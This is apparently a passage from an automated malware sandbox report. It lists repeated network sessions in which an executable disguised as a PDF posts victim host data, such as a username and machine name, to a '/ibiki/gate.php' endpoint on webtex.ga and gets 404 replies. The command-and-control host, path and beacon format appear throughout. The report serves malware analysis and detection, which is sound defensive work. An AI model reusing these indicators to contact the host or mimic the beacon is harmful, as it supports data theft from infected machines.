                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:54.179342031 CET267INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    71192.168.2.34979147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:54.407059908 CET268OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:54.423680067 CET268OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:54.467418909 CET268INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    72192.168.2.34979247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:55.055545092 CET269OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:55.072428942 CET269OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:55.114170074 CET270INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:12 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    73192.168.2.34979347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:55.316097975 CET271OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:55.332911015 CET271OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:55.375067949 CET271INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:12 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    74192.168.2.34979447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:56.857682943 CET272OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:56.874429941 CET272OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:56.919630051 CET273INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:14 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    75192.168.2.34979547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:57.187963009 CET273OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:57.204700947 CET274OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:57.247361898 CET274INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:14 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    76192.168.2.34979647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:57.510315895 CET275OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:57.526989937 CET275OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:57.671838045 CET275INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:14 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    77192.168.2.34979747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:57.913058996 CET276OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:57.931202888 CET276OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:57.976095915 CET277INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:15 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    78192.168.2.34979847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:58.226167917 CET277OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:58.242902040 CET278OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:58.284836054 CET278INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:15 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    79192.168.2.34979947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:58.533427000 CET279OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:58.553422928 CET279OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:58.594890118 CET279INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:15 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    8192.168.2.34971747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:32.151700974 CET75OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:32.168423891 CET75OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:32.212960958 CET76INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    80192.168.2.34980047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:58.817428112 CET280OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:58.834182978 CET280OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:58.876024008 CET281INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:16 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    81192.168.2.34980147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:59.111865997 CET282OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:59.128403902 CET282OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:59.170835972 CET283INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:16 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    82192.168.2.34980247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:59.381632090 CET285OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:59.398376942 CET286OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:59.445429087 CET287INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:16 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    83192.168.2.34980547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:59.677287102 CET290OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:59.693955898 CET290OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:59.735945940 CET290INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:16 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    84192.168.2.34980647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:59.972609997 CET298OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:59.989301920 CET298OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:00.035090923 CET299INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:17 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    85192.168.2.34980747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:00.268384933 CET304OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:00.285536051 CET304OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:00.328424931 CET304INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:17 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    86192.168.2.34980847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:01.603998899 CET305OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:01.621512890 CET305OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:01.806380033 CET306INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:18 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    87192.168.2.34980947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:02.010652065 CET307OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:02.027199030 CET307OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:02.067979097 CET307INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:19 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    88192.168.2.34981047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:02.313843012 CET308OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:02.331137896 CET308OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:02.375623941 CET309INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:19 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    89192.168.2.34981147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
